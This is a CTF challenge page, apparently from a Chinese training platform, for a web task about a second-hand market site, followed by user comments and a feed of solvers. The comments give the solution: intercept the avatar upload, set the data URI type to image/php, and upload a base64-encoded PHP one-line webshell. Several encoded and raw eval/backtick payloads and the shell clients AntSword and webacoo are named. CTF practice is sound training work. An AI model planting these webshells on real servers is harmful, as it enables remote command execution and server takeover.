xxx二手交易市场WEB 未解决

分数: 30 金币: 5
题目作者: Aman
一  血: dotast
一血奖励: 5金币
解  决: 2618
提  示:
描  述:
本人现实碰到的题目,无提示勿问
评论
言寺介 1月前

先上传正常图片,不然一直转圈圈,然后抓包修改图片data%3Aimage%2Fphp%3Bbase64%2C后面接一句话木马base64加密,然后蚁剑

回复 0

ixin 2月前

image=data%3aimage%2fphp%3bbase64%2cIDw%2fcGhwIGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4%3d

回复 0

zhuizhui 7月前

在post body构造一句话木马 image=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg== url 解码后即为 image=data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg==

回复 0

llc123 9月前

thinkphp v5.1.35 lts和xss不知道有没有操作空间

回复 0

LoadOverload 9月前

用webacoo亦可解决

回复 0

Zhumeng 1年前

注册账号登录用户会有个头像上传上传一个正常的头像发现被base64编码了,我们将一句话木马进行编码编码后上传将mime类型改成image/php

回复 0

zhuohao 1年前

蚁剑一直返回数据为空 一直连不上

回复 0
hackhui 1年前

一句话木马传参加''

回复 0

LLTVLL 1年前

一句话用这个 <?php eval($_POST['cmd']);?>,好像网上找的有的有问题

回复 0

BlueL1ght 1年前

<?php echo `$_POST[a]`;?>

回复 0

Daniel2023 2年前

<?php @eval($_POST['abc']);?> 上传data参数: data%3Aimage%2Fphp%3Bbase64%2C%2F9j%2FPD9waHAgQGV2YWwoJF9QT1NUWydhYmMnXSk7Pz4=

回复 1

WriteUp

image
nic016

5 金币

评分(11)

解题动态

Fengyu3321 攻破了该题 4天前
kr2yh 攻破了该题 5天前
lichuangpro 攻破了该题 6天前
hdcc1 攻破了该题 7天前
kiritoldws 攻破了该题 11天前
乱来小木 攻破了该题 11天前
李逍遥逛霍格沃茨 攻破了该题 14天前
跃迁ctfer 攻破了该题 16天前
Soraha 攻破了该题 16天前
mbw 攻破了该题 16天前
0xchang 攻破了该题 19天前
15144954824 攻破了该题 20天前
有点易斯但不多 攻破了该题 22天前
111hhh 攻破了该题 25天前
baka 攻破了该题 25天前
WindZQ 攻破了该题 27天前
azad33669 攻破了该题 27天前
SkyAsh 攻破了该题 28天前
Voltalee 攻破了该题 29天前
jiayou233l 攻破了该题 29天前
问题反馈